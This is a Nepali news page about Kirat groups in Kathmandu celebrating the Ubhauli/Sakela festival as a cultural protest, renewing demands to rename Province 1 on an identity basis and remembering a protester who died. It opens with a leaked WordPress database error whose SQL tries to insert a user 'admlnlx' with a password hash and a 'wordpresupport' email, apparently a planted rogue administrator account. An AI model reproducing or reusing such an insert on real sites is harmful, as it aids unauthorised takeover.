WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bs97d/txoNK4.AM7HmBnVVgssxMdF4.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 23:05:54', '', 'admlnlx', 'admlnlx')
काठमाडौ । किरात समुदायका संघ संस्थाहरूले यस पटकको किराति चाड वास/साकेला (उभौली) सास्कृतिक आन्दोलनको रूपमा सडकमा मनाएका छन् ।
हिजो (शुक्रबार) आन्दोलनका रूपमा नयाँ बानेश्वरमा उभौली वास/साकेला, यक्वा, तङ्नाम, श्याँदर पिदर, युच्याङचासुवा, भुम्या, भुमेलगायत किरात चाड मनाइएको छ । किरातीहरूको महान चाड उभौली, यक्वा तङनाम, श्याँदर पिदार, भुमे सामा, भुम्या, तोशीलगायतका चाडहरूमा नाचिने साकेला सिली, च्याब्रुङलगायतका नाच काठमाडौंमा नयाँ वानेश्वरदेखि माइतिघरमण्डलाको सडकमा मनाइएको हो ।
१ नम्बर प्रदेशको नाम कोशी खारेज गरी पहिचानको आधारमा प्रदेशको पुन: नामकरण गरिनुपर्ने पहिचान पक्षधरहरूको माग छ । गत चैत ५ गते विराटनगरमा पुनः नामकरणको माग राख्दै भएको आन्दोलनमा घाइते भएका पदम लिम्बू लाजेहाङको उपचारका क्रममा चैत १० गते मृत्यु भएको थियो। आज पर्वकाे दिन उहाँलगायतकाे सम्झनासमेत गरिएकाे र पहिचानकाे माग समेत उठाइएकाे छ ।